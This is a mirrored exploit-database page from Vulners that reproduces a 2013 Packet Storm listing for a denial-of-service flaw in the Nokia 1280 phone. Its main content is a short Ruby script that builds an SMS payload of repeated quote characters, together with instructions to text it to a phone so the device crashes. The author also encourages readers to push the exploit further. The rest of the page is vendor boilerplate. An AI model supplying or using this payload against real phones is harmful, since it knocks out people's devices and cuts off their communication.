Lucene search
K

Nokia 1280 Denial Of Service

🗓️ 03 Jul 2013 00:00:00Reported by Un0wn_XType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

Nokia 1280 DoS Vulnerability, July 01, 2013, SMS with malicious buffer crashes phone, Un0wn_

Code
`###########################################################################################################  
#Exploit Title: Nokia 1280 DoS Vulnerability  
#Author : Un0wn_X  
#E-Mail : [email protected]  
#Date : Monday, July 01,2013  
#Product: http://www.nokia.com/in-en/phones/phone/nokia-1280/  
###########################################################################################################  
  
#Vulnerability Advisory  
=======================  
You can send a SMS containing the malicious buffer and can crash the phone once it loads in the memory.  
  
#Video PoC  
============  
http://www.youtube.com/watch?v=csLuNZ0mjpI  
  
#Exploit  
=========  
  
#!/usr/bin/env ruby  
#Author: Un0wn_X  
  
begin  
buff = "Don't Scroll Down :D \n\n"  
buff += "'"*100  
  
file = open("exploit.txt","w")  
file.write(buff)  
file.close()  
  
puts "[+] Exploit created >> exploit.txt"  
puts "[*] Now send the text contained inside the exploit.txt by a sms"  
puts "[~] Un0wn_X"  
end  
  
#Final Notes  
=============  
I have no idea to attach this to a debugger and fuzz this system. You may exploit further  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Jul 2013 00:00Current
7.4High risk
Vulners AI Score7.4
27